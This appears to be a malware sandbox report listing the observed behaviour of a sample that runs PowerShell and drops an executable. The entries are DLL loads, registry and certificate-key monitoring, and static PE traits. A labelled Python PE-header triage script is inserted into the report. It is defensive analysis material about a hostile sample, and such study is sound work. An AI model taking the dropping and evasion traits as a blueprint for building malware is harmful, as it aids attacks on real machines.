Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe | Section loaded: apphelp.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe | Section loaded: sspicli.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe | Section loaded: wininet.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe | Section loaded: rstrtmgr.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe | Section loaded: ncrypt.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe | Section loaded: ntasn1.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe | Section loaded: dbghelp.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe | Section loaded: iertutil.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe | Section loaded: windows.storage.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe | Section loaded: wldp.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe | Section loaded: profapi.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe | Section loaded: kernel.appcore.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe | Section loaded: winhttp.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe | Section loaded: mswsock.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe | Section loaded: iphlpapi.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe | Section loaded: winnsi.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe | Section loaded: urlmon.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe | Section loaded: srvcli.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe | Section loaded: netutils.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe | Section loaded: dnsapi.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe | Section loaded: rasadhlp.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe | Section loaded: fwpuclnt.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe | Section loaded: schannel.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe | Section loaded: mskeyprotect.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe | Section loaded: msasn1.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe | Section loaded: dpapi.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe | Section loaded: cryptsp.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe | Section loaded: rsaenh.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe | Section loaded: cryptbase.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe | Section loaded: gpapi.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe | Section loaded: ncryptsslp.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: YYjRtxS70h.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: YYjRtxS70h.exe | Static file information: File size 13793970 > 1048576
Source: YYjRtxS70h.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: YYjRtxS70h.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\danie\source\repos\Qwest\Qwest\obj\Debug\Qwest.pdb source: YYjRtxS70h.exe
Source: YYjRtxS70h.exe | Static PE information: 0x833F0DF3 [Tue Oct 11 12:07:15 2039 UTC]
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe.0.dr | Static PE information: section name: .00cfg
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_04BE633D push eax; ret 10_2_04BE6351
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_04BE2CFF push 04B807BAh; retf 10_2_04BE2CFE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_04BE2C5C push 04B807BAh; retf 10_2_04BE2CFE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_04B63A9B push ebx; retf 13_2_04B63ADA
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe.0.dr | Static PE information: section name: .text entropy: 6.864188260151341
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | File created: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe
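The static rows above (a TimeDateStamp of 0x833F0DF3, which decodes to a link time in October 2039, the non-standard .00cfg section name and the .text entropy of the dropped file, together with the writeable .text section listed under Signatures) can all be reproduced from the raw PE headers. The Python below is an added example rather than code from the report: it builds a synthetic PE image in memory with those properties (the report's samples are not embedded), parses the COFF and section headers with struct, and emits the same findings. The 7.0 entropy threshold and the list of standard section names are this example's own assumptions.

```python
import math
import struct
import time
from datetime import datetime, timezone

# Added example (not part of the Joe Sandbox report): a minimal PE header parser
# that reproduces the static checks above (future TimeDateStamp, writeable code
# section, non-standard section name) and adds per-section entropy.

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".pdata",
                     ".idata", ".edata", ".tls", ".bss"}   # assumed allow-list
COFF_FMT = "<HHIIIHH"          # Machine, NumberOfSections, TimeDateStamp, ...
SECTION_FMT = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER, 40 bytes


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant data, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def build_sample_pe(timestamp: int, sections) -> bytes:
    """Construct a minimal PE image: DOS header, PE signature, COFF header with
    no optional header, section table, raw section data. Synthetic test input
    for this example, not the sample analysed in the report."""
    n = len(sections)
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack(COFF_FMT, 0x14C, n, timestamp, 0, 0, 0, 0x0102)
    raw_off = e_lfanew + 4 + struct.calcsize(COFF_FMT) + 40 * n
    table, blobs = b"", b""
    for name, chars, data in sections:
        table += struct.pack(SECTION_FMT, name.encode(), len(data), 0x1000,
                             len(data), raw_off + len(blobs), 0, 0, 0, 0, chars)
        blobs += data
    return dos + b"PE\0\0" + coff + table + blobs


def parse_pe(blob: bytes) -> dict:
    """Read TimeDateStamp and the section table from a PE image."""
    if blob[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    _, nsec, ts, _, _, opt_size, _ = struct.unpack_from(COFF_FMT, blob, e_lfanew + 4)
    table = e_lfanew + 4 + struct.calcsize(COFF_FMT) + opt_size
    sections = []
    for i in range(nsec):
        f = struct.unpack_from(SECTION_FMT, blob, table + 40 * i)
        name, raw_size, raw_ptr, chars = f[0], f[3], f[4], f[9]
        data = blob[raw_ptr:raw_ptr + raw_size]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", errors="replace"),
            "characteristics": chars,
            "entropy": shannon_entropy(data),
        })
    return {"timestamp": ts, "sections": sections}


def format_timestamp(ts: int) -> str:
    return datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")


def triage(blob: bytes, now=None) -> list:
    """Return human-readable findings in the order the checks run."""
    now = time.time() if now is None else now
    pe = parse_pe(blob)
    findings = []
    if pe["timestamp"] > now:
        findings.append("timestamp in the future: " + format_timestamp(pe["timestamp"]))
    for s in pe["sections"]:
        c, name = s["characteristics"], s["name"]
        is_code = bool(c & (IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE))
        if is_code and c & IMAGE_SCN_MEM_WRITE:
            findings.append(f"writeable code section: {name}")
        if name not in STANDARD_SECTIONS:
            findings.append(f"non-standard section name: {name}")
        if s["entropy"] > 7.0:
            findings.append(f"high-entropy section: {name} ({s['entropy']:.2f})")
    return findings


# Synthetic sample: the report's TimeDateStamp 0x833F0DF3, a .text section that
# is executable and writeable with uniformly distributed bytes, and a .00cfg section.
SAMPLE = build_sample_pe(0x833F0DF3, [
    (".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE,
     bytes(range(256)) * 4),
    (".00cfg", IMAGE_SCN_MEM_READ, b"\0" * 64),
])

if __name__ == "__main__":
    for line in triage(SAMPLE):
        print(line)
```

A real sample is fed in with `triage(open(path, "rb").read())`; the parser only needs the DOS and COFF headers plus the section table, so it works on both PE32 and PE32+ without reading the optional header. A future timestamp is only a weak indicator on its own (reproducible builds and some linkers deliberately write non-chronological values), which is why it is reported alongside the section checks rather than as a verdict.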

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (8 identical events)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (9 identical events)
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Process information set: NOOPENFILEERRORBOX (48 identical events)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
